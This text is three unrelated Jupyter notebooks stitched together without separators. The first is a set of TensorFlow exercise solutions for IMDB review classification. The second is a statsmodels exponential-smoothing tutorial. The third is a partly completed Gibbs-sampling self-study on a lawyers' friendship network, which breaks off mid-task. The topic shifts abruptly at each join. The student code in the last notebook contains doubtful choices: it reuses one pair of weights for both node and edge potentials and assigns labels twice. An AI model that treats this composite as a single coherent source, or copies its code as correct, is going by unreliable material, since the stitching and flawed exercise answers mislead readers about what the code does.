_Exercise: Create a binary classification model, using a `TextVectorization` layer to preprocess each review. If the `TextVectorization` layer is not yet available (or if you like a challenge), try to create your own custom preprocessing layer: you can use the functions in the `tf.strings` package, for example `lower()` to make everything lowercase, `regex_replace()` to replace punctuation with spaces, and `split()` to split words on spaces. You should use a lookup table to output word indices, which must be prepared in the `adapt()` method._
Let's first write a function to preprocess the reviews, cropping them to 300 characters, converting them to lower case, then replacing `<br />` and all non-letter characters with spaces, splitting the reviews into words, and finally padding or cropping each review so it ends up with exactly `n_words` tokens:
```
def preprocess(X_batch, n_words=50):
shape = tf.shape(X_batch) * tf.constant([1, 0]) + tf.constant([0, n_words])
Z = tf.strings.substr(X_batch, 0, 300)
Z = tf.strings.lower(Z)
Z = tf.strings.regex_replace(Z, b"<br\\s*/?>", b" ")
Z = tf.strings.regex_replace(Z, b"[^a-z]", b" ")
Z = tf.strings.split(Z)
return Z.to_tensor(shape=shape, default_value=b"<pad>")
X_example = tf.constant(["It's a great, great movie! I loved it.", "It was terrible, run away!!!"])
preprocess(X_example)
```
Now let's write a second utility function that will take a data sample with the same format as the output of the `preprocess()` function, and will output the list of the top `max_size` most frequent words, ensuring that the padding token is first:
```
from collections import Counter
def get_vocabulary(data_sample, max_size=1000):
preprocessed_reviews = preprocess(data_sample).numpy()
counter = Counter()
for words in preprocessed_reviews:
for word in words:
if word != b"<pad>":
counter[word] += 1
return [b"<pad>"] + [word for word, count in counter.most_common(max_size)]
get_vocabulary(X_example)
```
Now we are ready to create the `TextVectorization` layer. Its constructor just saves the hyperparameters (`max_vocabulary_size` and `n_oov_buckets`). The `adapt()` method computes the vocabulary using the `get_vocabulary()` function, then it builds a `StaticVocabularyTable` (see Chapter 16 for more details). The `call()` method preprocesses the reviews to get a padded list of words for each review, then it uses the `StaticVocabularyTable` to look up the index of each word in the vocabulary:
```
class TextVectorization(keras.layers.Layer):
def __init__(self, max_vocabulary_size=1000, n_oov_buckets=100, dtype=tf.string, **kwargs):
super().__init__(dtype=dtype, **kwargs)
self.max_vocabulary_size = max_vocabulary_size
self.n_oov_buckets = n_oov_buckets
def adapt(self, data_sample):
self.vocab = get_vocabulary(data_sample, self.max_vocabulary_size)
words = tf.constant(self.vocab)
word_ids = tf.range(len(self.vocab), dtype=tf.int64)
vocab_init = tf.lookup.KeyValueTensorInitializer(words, word_ids)
self.table = tf.lookup.StaticVocabularyTable(vocab_init, self.n_oov_buckets)
def call(self, inputs):
preprocessed_inputs = preprocess(inputs)
return self.table.lookup(preprocessed_inputs)
```
Let's try it on our small `X_example` we defined earlier:
```
text_vectorization = TextVectorization()
text_vectorization.adapt(X_example)
text_vectorization(X_example)
```
Looks good! As you can see, each review was cleaned up and tokenized, then each word was encoded as its index in the vocabulary (all the 0s correspond to the `<pad>` tokens).
Now let's create another `TextVectorization` layer and let's adapt it to the full IMDB training set (if the training set did not fit in RAM, we could just use a smaller sample of the training set by calling `train_set.take(500)`):
```
max_vocabulary_size = 1000
n_oov_buckets = 100
sample_review_batches = train_set.map(lambda review, label: review)
sample_reviews = np.concatenate(list(sample_review_batches.as_numpy_iterator()),
axis=0)
text_vectorization = TextVectorization(max_vocabulary_size, n_oov_buckets,
input_shape=[])
text_vectorization.adapt(sample_reviews)
```
Let's run it on the same `X_example`, just to make sure the word IDs are larger now, since the vocabulary is bigger:
```
text_vectorization(X_example)
```
Good! Now let's take a look at the first 10 words in the vocabulary:
```
text_vectorization.vocab[:10]
```
These are the most common words in the reviews.
Now to build our model we will need to encode all these word IDs somehow. One approach is to create bags of words: for each review, and for each word in the vocabulary, we count the number of occurrences of that word in the review. For example:
```
simple_example = tf.constant([[1, 3, 1, 0, 0], [2, 2, 0, 0, 0]])
tf.reduce_sum(tf.one_hot(simple_example, 4), axis=1)
```
The first review has 2 times the word 0, 2 times the word 1, 0 times the word 2, and 1 time the word 3, so its bag-of-words representation is `[2, 2, 0, 1]`. Similarly, the second review has 3 times the word 0, 0 times the word 1, and so on. Let's wrap this logic in a small custom layer, and let's test it. We'll drop the counts for the word 0, since this corresponds to the `<pad>` token, which we don't care about.
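Before we do, these counts can be sanity-checked with a quick plain-Python sketch (independent of TensorFlow; `bag_of_words_counts` is just an illustrative helper, not part of the model):

```python
from collections import Counter

def bag_of_words_counts(token_ids, n_tokens):
    """Count how many times each token ID in [0, n_tokens) occurs."""
    counts = Counter(token_ids)
    return [counts[token] for token in range(n_tokens)]

bag_of_words_counts([1, 3, 1, 0, 0], n_tokens=4)  # [2, 2, 0, 1]
bag_of_words_counts([2, 2, 0, 0, 0], n_tokens=4)  # [3, 0, 2, 0]
```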
```
class BagOfWords(keras.layers.Layer):
def __init__(self, n_tokens, dtype=tf.int32, **kwargs):
super().__init__(dtype=dtype, **kwargs)
self.n_tokens = n_tokens
def call(self, inputs):
one_hot = tf.one_hot(inputs, self.n_tokens)
return tf.reduce_sum(one_hot, axis=1)[:, 1:]
```
Let's test it:
```
bag_of_words = BagOfWords(n_tokens=4)
bag_of_words(simple_example)
```
It works fine! Now let's create another `BagOfWords` layer with the right vocabulary size for our training set:
```
n_tokens = max_vocabulary_size + n_oov_buckets + 1 # add 1 for <pad>
bag_of_words = BagOfWords(n_tokens)
```
We're ready to train the model!
```
model = keras.models.Sequential([
text_vectorization,
bag_of_words,
keras.layers.Dense(100, activation="relu"),
keras.layers.Dense(1, activation="sigmoid"),
])
model.compile(loss="binary_crossentropy", optimizer="nadam",
metrics=["accuracy"])
model.fit(train_set, epochs=5, validation_data=valid_set)
```
We get about 73.5% accuracy on the validation set after just the first epoch, but after that the model makes no significant progress. We will do better in Chapter 16. For now the point is just to perform efficient preprocessing using `tf.data` and Keras preprocessing layers.
### e.
_Exercise: Add an `Embedding` layer and compute the mean embedding for each review, multiplied by the square root of the number of words (see Chapter 16). This rescaled mean embedding can then be passed to the rest of your model._
To compute the mean embedding for each review, and multiply it by the square root of the number of words in that review, we will need a little function. For each sentence, this function needs to compute $M \times \sqrt N$, where $M$ is the mean of all the word embeddings in the sentence (excluding padding tokens), and $N$ is the number of words in the sentence (also excluding padding tokens). We can rewrite $M$ as $\dfrac{S}{N}$, where $S$ is the sum of all word embeddings (it does not matter whether or not we include the padding tokens in this sum, since their representation is a zero vector). So the function must return $M \times \sqrt N = \dfrac{S}{N} \times \sqrt N = \dfrac{S}{\sqrt N \times \sqrt N} \times \sqrt N= \dfrac{S}{\sqrt N}$.
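This identity can be verified numerically with a quick plain-Python sketch (the embedding values here are made up for illustration; the padding row is a zero vector and is excluded from $N$):

```python
import math

# One "sentence": two real word embeddings plus one <pad> row (all zeros).
sentence = [[1.0, 2.0, 3.0], [4.0, 5.0, 0.0], [0.0, 0.0, 0.0]]
n = sum(1 for row in sentence if any(row))        # N = number of real words
s = [sum(col) for col in zip(*sentence)]          # S; padding rows add nothing
m_times_sqrt_n = [(v / n) * math.sqrt(n) for v in s]  # M * sqrt(N)
s_over_sqrt_n = [v / math.sqrt(n) for v in s]         # S / sqrt(N)
# Both give the same vector (up to floating-point rounding).
```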
```
def compute_mean_embedding(inputs):
not_pad = tf.math.count_nonzero(inputs, axis=-1)
n_words = tf.math.count_nonzero(not_pad, axis=-1, keepdims=True)
sqrt_n_words = tf.math.sqrt(tf.cast(n_words, tf.float32))
return tf.reduce_sum(inputs, axis=1) / sqrt_n_words
another_example = tf.constant([[[1., 2., 3.], [4., 5., 0.], [0., 0., 0.]],
[[6., 0., 0.], [0., 0., 0.], [0., 0., 0.]]])
compute_mean_embedding(another_example)
```
Let's check that this is correct. The first review contains 2 words (the last token is a zero vector, which represents the `<pad>` token). Let's compute the mean embedding for these 2 words, and multiply the result by the square root of 2:
```
tf.reduce_mean(another_example[0:1, :2], axis=1) * tf.sqrt(2.)
```
Looks good! Now let's check the second review, which contains just one word (we ignore the two padding tokens):
```
tf.reduce_mean(another_example[1:2, :1], axis=1) * tf.sqrt(1.)
```
Perfect. Now we're ready to train our final model. It's the same as before, except we replaced the `BagOfWords` layer with an `Embedding` layer followed by a `Lambda` layer that calls the `compute_mean_embedding()` function:
```
embedding_size = 20
model = keras.models.Sequential([
text_vectorization,
keras.layers.Embedding(input_dim=n_tokens,
output_dim=embedding_size,
mask_zero=True), # <pad> tokens => zero vectors
keras.layers.Lambda(compute_mean_embedding),
keras.layers.Dense(100, activation="relu"),
keras.layers.Dense(1, activation="sigmoid"),
])
```
### f.
_Exercise: Train the model and see what accuracy you get. Try to optimize your pipelines to make training as fast as possible._
```
model.compile(loss="binary_crossentropy", optimizer="nadam", metrics=["accuracy"])
model.fit(train_set, epochs=5, validation_data=valid_set)
```
The model does not perform better with embeddings (but we will do better in Chapter 16). The pipeline looks fast enough (we optimized it earlier).
### g.
_Exercise: Use TFDS to load the same dataset more easily: `tfds.load("imdb_reviews")`._
```
import tensorflow_datasets as tfds
datasets = tfds.load(name="imdb_reviews")
train_set, test_set = datasets["train"], datasets["test"]
for example in train_set.take(1):
print(example["text"])
print(example["label"])
```
# Tutorial
Let us consider chapter 7 of the excellent treatise on the subject of exponential smoothing by Hyndman and Athanasopoulos [1].
We will work through all the examples in the chapter as they unfold.
[1] [Hyndman, Rob J., and George Athanasopoulos. Forecasting: principles and practice. OTexts, 2014.](https://www.otexts.org/fpp/7)
# Exponential smoothing
First we load some data. We have included the R data in the notebook for expedience.
```
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from statsmodels.tsa.api import ExponentialSmoothing, SimpleExpSmoothing, Holt
data = [446.6565, 454.4733, 455.663 , 423.6322, 456.2713, 440.5881, 425.3325, 485.1494, 506.0482, 526.792 , 514.2689, 494.211 ]
index = pd.date_range(start='1996', end='2008', freq='A')
oildata = pd.Series(data, index)
oildata.index = pd.DatetimeIndex(oildata.index, freq=pd.infer_freq(oildata.index))
data = [17.5534, 21.86 , 23.8866, 26.9293, 26.8885, 28.8314, 30.0751, 30.9535, 30.1857, 31.5797, 32.5776, 33.4774, 39.0216, 41.3864, 41.5966]
index = pd.date_range(start='1990', end='2005', freq='A')
air = pd.Series(data, index)
air.index = pd.DatetimeIndex(air.index, freq=pd.infer_freq(air.index))
data = [263.9177, 268.3072, 260.6626, 266.6394, 277.5158, 283.834 , 290.309 , 292.4742, 300.8307, 309.2867, 318.3311, 329.3724, 338.884 , 339.2441, 328.6006, 314.2554, 314.4597, 321.4138, 329.7893, 346.3852, 352.2979, 348.3705, 417.5629, 417.1236, 417.7495, 412.2339, 411.9468, 394.6971, 401.4993, 408.2705, 414.2428]
index = pd.date_range(start='1970', end='2001', freq='A')
livestock2 = pd.Series(data, index)
livestock2.index = pd.DatetimeIndex(livestock2.index, freq=pd.infer_freq(livestock2.index))
data = [407.9979 , 403.4608, 413.8249, 428.105 , 445.3387, 452.9942, 455.7402]
index = pd.date_range(start='2001', end='2008', freq='A')
livestock3 = pd.Series(data, index)
livestock3.index = pd.DatetimeIndex(livestock3.index, freq=pd.infer_freq(livestock3.index))
data = [41.7275, 24.0418, 32.3281, 37.3287, 46.2132, 29.3463, 36.4829, 42.9777, 48.9015, 31.1802, 37.7179, 40.4202, 51.2069, 31.8872, 40.9783, 43.7725, 55.5586, 33.8509, 42.0764, 45.6423, 59.7668, 35.1919, 44.3197, 47.9137]
index = pd.date_range(start='2005', periods=len(data), freq='QS')  # quarters 2005Q1 through 2010Q4
aust = pd.Series(data, index)
aust.index = pd.DatetimeIndex(aust.index, freq=pd.infer_freq(aust.index))
```
## Simple Exponential Smoothing
Let's use simple exponential smoothing to forecast the oil data below.
```
ax=oildata.plot()
ax.set_xlabel("Year")
ax.set_ylabel("Oil (millions of tonnes)")
plt.show()
print("Figure 7.1: Oil production in Saudi Arabia from 1996 to 2007.")
```
Here we run three variants of simple exponential smoothing:
1. In ```fit1``` we do not use the automatic optimization, but instead explicitly provide the model with the parameter $\alpha=0.2$.
2. In ```fit2```, as above, we choose $\alpha=0.6$.
3. In ```fit3``` we allow statsmodels to automatically find an optimized $\alpha$ value for us. This is the recommended approach.
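Under the hood, simple exponential smoothing is just the recursion $l_t = \alpha y_t + (1 - \alpha) l_{t-1}$, with all forecasts flat at the last level. Here is a minimal plain-Python sketch of that recursion (initializing the level to the first observation is just one simple convention; statsmodels also estimates the initial level when optimizing):

```python
def simple_exp_smoothing(series, alpha):
    """One-step-ahead fitted values and final level for SES.

    Initializes the level to the first observation (a simple convention).
    """
    level = series[0]
    fitted = []
    for y in series:
        fitted.append(level)                     # forecast made before seeing y
        level = alpha * y + (1 - alpha) * level  # update the level
    return fitted, level  # every h-step forecast equals the final level

# With alpha=1 the forecast is just the previous observation (the naive method):
simple_exp_smoothing([1.0, 2.0, 3.0], alpha=1.0)  # ([1.0, 1.0, 2.0], 3.0)
```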
```
fit1 = SimpleExpSmoothing(oildata).fit(smoothing_level=0.2,optimized=False)
fcast1 = fit1.forecast(3).rename(r'$\alpha=0.2$')
fit2 = SimpleExpSmoothing(oildata).fit(smoothing_level=0.6,optimized=False)
fcast2 = fit2.forecast(3).rename(r'$\alpha=0.6$')
fit3 = SimpleExpSmoothing(oildata).fit()
fcast3 = fit3.forecast(3).rename(r'$\alpha=%s$'%fit3.model.params['smoothing_level'])
ax = oildata.plot(marker='o', color='black', figsize=(12,8))
fcast1.plot(marker='o', ax=ax, color='blue', legend=True)
fit1.fittedvalues.plot(marker='o', ax=ax, color='blue')
fcast2.plot(marker='o', ax=ax, color='red', legend=True)
fit2.fittedvalues.plot(marker='o', ax=ax, color='red')
fcast3.plot(marker='o', ax=ax, color='green', legend=True)
fit3.fittedvalues.plot(marker='o', ax=ax, color='green')
plt.show()
```
## Holt's Method
Let's take a look at another example.
This time we use air pollution data and Holt's method.
We will again fit three variants.
1. In ```fit1``` we again choose not to use the optimizer and provide explicit values for $\alpha=0.8$ and $\beta=0.2$.
2. In ```fit2``` we do the same as in ```fit1```, but choose to use an exponential model rather than Holt's additive model.
3. In ```fit3``` we use a damped version of Holt's additive model, but allow the damping parameter $\phi$ to be optimized while fixing the values $\alpha=0.8$ and $\beta=0.2$.
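Holt's linear method extends SES with a trend component: $l_t = \alpha y_t + (1-\alpha)(l_{t-1} + b_{t-1})$ and $b_t = \beta (l_t - l_{t-1}) + (1-\beta) b_{t-1}$, with $h$-step forecast $l_t + h\,b_t$. A minimal plain-Python sketch of these recursions (initializing level and trend from the first two observations, one simple convention; not how statsmodels initializes):

```python
def holt_linear_forecast(series, alpha, beta, h=1):
    """h-step forecasts from Holt's additive (linear) trend method."""
    level, trend = series[0], series[1] - series[0]  # simple initialization
    for y in series[1:]:
        prev_level = level
        level = alpha * y + (1 - alpha) * (level + trend)
        trend = beta * (level - prev_level) + (1 - beta) * trend
    return [level + (step + 1) * trend for step in range(h)]

# On perfectly linear data the forecasts continue the line (approx. [5.0, 6.0]):
holt_linear_forecast([1.0, 2.0, 3.0, 4.0], alpha=0.8, beta=0.2, h=2)
```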
```
fit1 = Holt(air).fit(smoothing_level=0.8, smoothing_slope=0.2, optimized=False)
fcast1 = fit1.forecast(5).rename("Holt's linear trend")
fit2 = Holt(air, exponential=True).fit(smoothing_level=0.8, smoothing_slope=0.2, optimized=False)
fcast2 = fit2.forecast(5).rename("Exponential trend")
fit3 = Holt(air, damped=True).fit(smoothing_level=0.8, smoothing_slope=0.2)
fcast3 = fit3.forecast(5).rename("Additive damped trend")
ax = air.plot(color="black", marker="o", figsize=(12,8))
fit1.fittedvalues.plot(ax=ax, color='blue')
fcast1.plot(ax=ax, color='blue', marker="o", legend=True)
fit2.fittedvalues.plot(ax=ax, color='red')
fcast2.plot(ax=ax, color='red', marker="o", legend=True)
fit3.fittedvalues.plot(ax=ax, color='green')
fcast3.plot(ax=ax, color='green', marker="o", legend=True)
plt.show()
```
### Seasonally adjusted data
Let's look at some seasonally adjusted livestock data. We fit five models.
The table below allows us to compare results when we use exponential versus additive and damped versus non-damped combinations.
Note: ```fit4``` does not allow the parameter $\phi$ to be optimized, instead providing a fixed value of $\phi=0.98$.
```
fit1 = SimpleExpSmoothing(livestock2).fit()
fit2 = Holt(livestock2).fit()
fit3 = Holt(livestock2,exponential=True).fit()
fit4 = Holt(livestock2,damped=True).fit(damping_slope=0.98)
fit5 = Holt(livestock2,exponential=True,damped=True).fit()
params = ['smoothing_level', 'smoothing_slope', 'damping_slope', 'initial_level', 'initial_slope']
results=pd.DataFrame(index=[r"$\alpha$",r"$\beta$",r"$\phi$",r"$l_0$","$b_0$","SSE"] ,columns=['SES', "Holt's","Exponential", "Additive", "Multiplicative"])
results["SES"] = [fit1.params[p] for p in params] + [fit1.sse]
results["Holt's"] = [fit2.params[p] for p in params] + [fit2.sse]
results["Exponential"] = [fit3.params[p] for p in params] + [fit3.sse]
results["Additive"] = [fit4.params[p] for p in params] + [fit4.sse]
results["Multiplicative"] = [fit5.params[p] for p in params] + [fit5.sse]
results
```
### Plots of Seasonally Adjusted Data
The following plots allow us to evaluate the level and slope/trend components of the above table's fits.
```
for fit in [fit2,fit4]:
pd.DataFrame(np.c_[fit.level,fit.slope]).rename(
columns={0:'level',1:'slope'}).plot(subplots=True)
plt.show()
print('Figure 7.4: Level and slope components for Holt’s linear trend method and the additive damped trend method.')
```
## Comparison
Here we plot a comparison of Simple Exponential Smoothing and Holt's methods for various additive, exponential and damped combinations. All of the models' parameters will be optimized by statsmodels.
```
fit1 = SimpleExpSmoothing(livestock2).fit()
fcast1 = fit1.forecast(9).rename("SES")
fit2 = Holt(livestock2).fit()
fcast2 = fit2.forecast(9).rename("Holt's")
fit3 = Holt(livestock2, exponential=True).fit()
fcast3 = fit3.forecast(9).rename("Exponential")
fit4 = Holt(livestock2, damped=True).fit(damping_slope=0.98)
fcast4 = fit4.forecast(9).rename("Additive Damped")
fit5 = Holt(livestock2, exponential=True, damped=True).fit()
fcast5 = fit5.forecast(9).rename("Multiplicative Damped")
ax = livestock2.plot(color="black", marker="o", figsize=(12,8))
livestock3.plot(ax=ax, color="black", marker="o", legend=False)
fcast1.plot(ax=ax, color='red', legend=True)
fcast2.plot(ax=ax, color='green', legend=True)
fcast3.plot(ax=ax, color='blue', legend=True)
fcast4.plot(ax=ax, color='cyan', legend=True)
fcast5.plot(ax=ax, color='magenta', legend=True)
ax.set_ylabel('Livestock, sheep in Asia (millions)')
plt.show()
print('Figure 7.5: Forecasting livestock, sheep in Asia: comparing forecasting performance of non-seasonal methods.')
```
## Holt-Winters Seasonal
Finally we are able to run the full Holt-Winters seasonal exponential smoothing, including a trend component and a seasonal component.
Statsmodels allows for all the combinations, as shown in the examples below:
1. ```fit1``` additive trend, additive seasonal of period ```season_length=4``` and the use of a Box-Cox transformation.
1. ```fit2``` additive trend, multiplicative seasonal of period ```season_length=4``` and the use of a Box-Cox transformation.
1. ```fit3``` additive damped trend, additive seasonal of period ```season_length=4``` and the use of a Box-Cox transformation.
1. ```fit4``` additive damped trend, multiplicative seasonal of period ```season_length=4``` and the use of a Box-Cox transformation.
The plot shows the results and forecast for ```fit1``` and ```fit2```.
The table allows us to compare the results and parameterizations.
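For reference, the additive Holt-Winters recursions (a standard formulation, with seasonal period $m$ and smoothing parameters $\alpha$, $\beta^*$, $\gamma$) are:

$$
\begin{aligned}
\ell_t &= \alpha (y_t - s_{t-m}) + (1-\alpha)(\ell_{t-1} + b_{t-1})\\
b_t &= \beta^*(\ell_t - \ell_{t-1}) + (1-\beta^*) b_{t-1}\\
s_t &= \gamma (y_t - \ell_{t-1} - b_{t-1}) + (1-\gamma) s_{t-m}\\
\hat{y}_{t+h|t} &= \ell_t + h b_t + s_{t+h-m(k+1)}
\end{aligned}
$$

where $k$ is the integer part of $(h-1)/m$, so the forecast always uses the seasonal index from the final year of data. The multiplicative variants replace the seasonal differences by ratios.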
```
fit1 = ExponentialSmoothing(aust, seasonal_periods=4, trend='add', seasonal='add').fit(use_boxcox=True)
fit2 = ExponentialSmoothing(aust, seasonal_periods=4, trend='add', seasonal='mul').fit(use_boxcox=True)
fit3 = ExponentialSmoothing(aust, seasonal_periods=4, trend='add', seasonal='add', damped=True).fit(use_boxcox=True)
fit4 = ExponentialSmoothing(aust, seasonal_periods=4, trend='add', seasonal='mul', damped=True).fit(use_boxcox=True)
results=pd.DataFrame(index=[r"$\alpha$",r"$\beta$",r"$\phi$",r"$\gamma$",r"$l_0$","$b_0$","SSE"])
params = ['smoothing_level', 'smoothing_slope', 'damping_slope', 'smoothing_seasonal', 'initial_level', 'initial_slope']
results["Additive"] = [fit1.params[p] for p in params] + [fit1.sse]
results["Multiplicative"] = [fit2.params[p] for p in params] + [fit2.sse]
results["Additive Dam"] = [fit3.params[p] for p in params] + [fit3.sse]
results["Multiplica Dam"] = [fit4.params[p] for p in params] + [fit4.sse]
ax = aust.plot(figsize=(10,6), marker='o', color='black', title="Forecasts from Holt-Winters' multiplicative method" )
ax.set_ylabel("International visitor night in Australia (millions)")
ax.set_xlabel("Year")
fit1.fittedvalues.plot(ax=ax, style='--', color='red')
fit2.fittedvalues.plot(ax=ax, style='--', color='green')
fit1.forecast(8).plot(ax=ax, style='--', marker='o', color='red', legend=True)
fit2.forecast(8).plot(ax=ax, style='--', marker='o', color='green', legend=True)
plt.show()
print("Figure 7.6: Forecasting international visitor nights in Australia using Holt-Winters method with both additive and multiplicative seasonality.")
results
```
### The Internals
It is possible to get at the internals of the Exponential Smoothing models.
Here we show some tables that allow you to view side by side the original values $y_t$, the level $l_t$, the trend $b_t$, the season $s_t$ and the fitted values $\hat{y}_t$.
```
pd.DataFrame(np.c_[aust, fit1.level, fit1.slope, fit1.season, fit1.fittedvalues],
columns=[r'$y_t$',r'$l_t$',r'$b_t$',r'$s_t$',r'$\hat{y}_t$'],index=aust.index). \
append(fit1.forecast(8).rename(r'$\hat{y}_t$').to_frame())
pd.DataFrame(np.c_[aust, fit2.level, fit2.slope, fit2.season, fit2.fittedvalues],
columns=[r'$y_t$',r'$l_t$',r'$b_t$',r'$s_t$',r'$\hat{y}_t$'],index=aust.index). \
append(fit2.forecast(8).rename(r'$\hat{y}_t$').to_frame())
```
Finally lets look at the levels, slopes/trends and seasonal components of the models.
```
states1 = pd.DataFrame(np.c_[fit1.level, fit1.slope, fit1.season], columns=['level','slope','seasonal'], index=aust.index)
states2 = pd.DataFrame(np.c_[fit2.level, fit2.slope, fit2.season], columns=['level','slope','seasonal'], index=aust.index)
fig, [[ax1, ax4],[ax2, ax5], [ax3, ax6]] = plt.subplots(3, 2, figsize=(12,8))
states1[['level']].plot(ax=ax1)
states1[['slope']].plot(ax=ax2)
states1[['seasonal']].plot(ax=ax3)
states2[['level']].plot(ax=ax4)
states2[['slope']].plot(ax=ax5)
states2[['seasonal']].plot(ax=ax6)
plt.show()
```
# Self Study 4
In this self study we implement and test a simple Markov network model for node prediction, and a Gibbs sampling inference (prediction) process.
For this material there is no direct support from scikit learn, so we have to do a little more coding ourselves than before ...
For basic network functionalities we use the `networkx` package: https://networkx.github.io/documentation/stable/index.html
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import networkx as nx
from networkx import read_edgelist
import random
```
We are using a social network consisting of 71 lawyers. A description of the network and the original data can be found here:
http://moreno.ss.uci.edu/data.html#lazega
Of the three different relationships included in the data we will only be using the 'friendship' relation. This is a directed relationship, i.e., friends(a,b) does not necessarily imply friends(b,a) according to the data.
We first construct a networkx graph from the file lazega-friends.edges. The node attributes are read from a separate file into a Pandas data frame:
```
lazega=read_edgelist('lazega-friends.edges',nodetype=int)
node_atts=pd.read_csv("lazega-attributes.txt", sep=' ')
print(node_atts.loc[1,'nodeGender'])
display(node_atts)
```
Now we annotate the nodes in the graph with some selected attributes (later on, if you want to do more, you can consider additional attributes).
```
for i in range(node_atts.shape[0]):
lazega.add_node(node_atts.loc[i,'nodeID'], gender=node_atts.loc[i,'nodeGender'])
lazega.add_node(node_atts.loc[i,'nodeID'], office=node_atts.loc[i,'nodeOffice'])
lazega.add_node(node_atts.loc[i,'nodeID'], true_practice=node_atts.loc[i,'nodePractice'])
if random.random() > 0.4:
lazega.add_node(node_atts.loc[i,'nodeID'], observed_practice=node_atts.loc[i,'nodePractice'])
else:
lazega.add_node(node_atts.loc[i,'nodeID'], observed_practice=np.nan)
```
The 'practice' attribute is going to be our class label that we want to predict. Therefore, we pretend that this attribute is not observed for some randomly selected nodes. We do this by adding a new attribute 'observed_practice' which has either the true practice value, or 'nan' for unobserved.
```
random.seed(5)
for i in range(node_atts.shape[0]):
if random.random() > 0.4:
lazega.add_node(node_atts.loc[i,'nodeID'], observed_practice=node_atts.loc[i,'nodePractice'])
else:
lazega.add_node(node_atts.loc[i,'nodeID'], observed_practice=np.nan)
```
The following is a utility function for retrieving a plain numpy array containing the values of a selected attribute for all nodes.
```
def get_att_array(G,att_name):
ret_array=np.zeros(nx.number_of_nodes(G))
for i,n in enumerate(G.nodes()):
ret_array[i]=G.nodes[n][att_name]
return(ret_array)
print(get_att_array(lazega,'observed_practice'))
```
**Beware:** lazega.nodes[n] returns nodes according to their key (= nodeID) value, which are the integers 1..71, whereas the arrays returned by get_att_array are indexed 0..70.
We can draw the network with node coloring according to a selected attribute as follows:
```
nx.draw_kamada_kawai(lazega,with_labels=True,node_color=get_att_array(lazega,'observed_practice'))
```
We now want to predict the missing 'practice' labels using Gibbs sampling on a Markov network model. We will first need to initialize values for the unobserved attributes.
**Task 1:** complete the following function:
```
def init_practice():
    observed = get_att_array(lazega, 'observed_practice')
    for i in range(len(observed)):
        if not np.isnan(observed[i]):
            lazega.add_node(node_atts.loc[i, 'nodeID'], predicted_practice=observed[i])
        else:
            lazega.add_node(node_atts.loc[i, 'nodeID'], predicted_practice=random.randint(1, 2))
    print(get_att_array(lazega, 'predicted_practice'))

init_practice()
```
We next define some potential functions. Mostly we will be using node or edge potentials, i.e., potential functions that
depend only on the attributes of a single node, or on the attributes of two nodes (connected by an edge).
Instead of defining the potential function directly, it is more convenient to first define the log of the potential function. Then, instead of taking a big product, one can first take the sum of relevant potentials, and apply an exponential at the end (cf. slides 12, 20, and 23). E.g., the log of the homophily potential (slide 20) is w in the case A_i=A_j, and 0 otherwise. Also, all real numbers are then permissible return values, without the non-negativity condition.
The following are examples of a simple node (log-)potential and an "ising-style" homophily potential. Both potential functions depend on numerical parameters w1,w2. You may start with using these two log-potentials only, and later define additional potential functions.
```
def n_log_potential_1(n,w1,w2):
if n['predicted_practice'] == 1: return w1
else: return w2
def n_log_potential_2(n1,n2,w1,w2):
if n1['predicted_practice']==n2['predicted_practice']: return w1
else: return w2
def n_log_potential_3(n,w1,w2):
    if n['predicted_practice'] == 2: return w1
    else: return w2
print(n_log_potential_1(lazega.nodes[4],-1,1))
print(n_log_potential_2(lazega.nodes[4],lazega.nodes[6],-2,3))
print(lazega.nodes[10])
```
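Before attempting Task 2, it helps to see the arithmetic in isolation. The conditional probability used in Gibbs sampling is just a two-state softmax of the summed log-potentials; the following minimal sketch (with made-up log-potential sums, independent of the graph) illustrates it:

```
import math

def conditional_prob(s1, s2):
    # P(state 1 | rest) = exp(s1) / (exp(s1) + exp(s2)),
    # where s1, s2 are the summed log-potentials for the two candidate states.
    # Subtracting the max first keeps the exponentials numerically stable.
    m = max(s1, s2)
    e1, e2 = math.exp(s1 - m), math.exp(s2 - m)
    return e1 / (e1 + e2)

print(conditional_prob(0.0, 0.0))   # equal potentials: probability 0.5
print(conditional_prob(2.0, -2.0))  # state 1 strongly favoured
```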
**Task 2:** Write a Gibbs-sampling function for re-sampling the 'predicted_practice' attribute value for a node *n*. At this point we need not worry whether for *n* the actual 'practice' value is known or not.
```
import math
def gibbs_sample(n, w1, w2):
    # n is a node key (nodeID) of the graph; we re-sample its
    # 'predicted_practice' value from its conditional distribution.
    log_pot = {}
    for state in (1, 2):
        lazega.nodes[n]['predicted_practice'] = state
        # node potential for this candidate state
        total = n_log_potential_1(lazega.nodes[n], w1, w2)
        # edge potentials with all (in- and out-) neighbors
        for nb in nx.all_neighbors(lazega, n):
            total += n_log_potential_2(lazega.nodes[n], lazega.nodes[nb], w1, w2)
        log_pot[state] = total
    # conditional probability of state 1 (cf. slides 12 and 23)
    new_probability = math.exp(log_pot[1]) / (math.exp(log_pot[1]) + math.exp(log_pot[2]))
    if random.uniform(0, 1) < new_probability:
        lazega.nodes[n]['predicted_practice'] = 1
    else:
        lazega.nodes[n]['predicted_practice'] = 2
    return lazega.nodes[n]['predicted_practice']

gibbs_sample(4, -1, 1)
# Iterate over all log-potential functions you want to use
# For node potentials, evaluate the potential for the given node n
# For edge potentials, evaluate the potential for all pairs (n,n') where n' is a neighbor in the 'friendship' graph.
#
# Since the friendship graph is directed, there are three possibilities of how to do this precisely:
# - consider all n' where friends(n,n')
# - consider all n' where friends(n',n)
# - consider both cases of n'
#
# The method nx.all_neighbors(lazega,n) will return an iterator over both types of neighbors of n, so the third
# option is the most convenient to use (and maybe also the most sensible)
#
# Sum the values of all the potential functions, and take the exponential.
# This has to be done for both possible values of the 'predicted_practice' value for n
#
# You will probably need to add arguments to the gibbs_sample method for the numerical parameters of
# the potential functions that you are using.
#
# Calculate the probability for predicted_practice(n) according to the quotient shown on slide 12 (see also slide 23)
#
# Set the new value of predicted_practice(n) randomly according to the probabilities you have just computed.
```
Once the resampling of the predicted_practice attribute for a single node is in place, the rest is quite straightforward:
**Task 3**: Write a function that performs one round of Gibbs sampling, i.e., re-samples the predicted values for all nodes for which the class attribute is unknown.
```
def gibbs_one_round(G):
    # Re-sample 'predicted_practice' only for nodes whose class label is
    # unobserved; the 'observed_practice' attribute itself is left untouched.
    for i in G.nodes():
        if np.isnan(G.nodes[i]['observed_practice']):
            gibbs_sample(i, -1, 1)
    return get_att_array(G, 'predicted_practice')

gibbs_one_round(lazega)
```
Now we can put everything together to use our model to predict the 'practice' attribute.
**Task 4**: write code for doing the following:
```
random.seed(5)
init_practice()
burn_in = 100
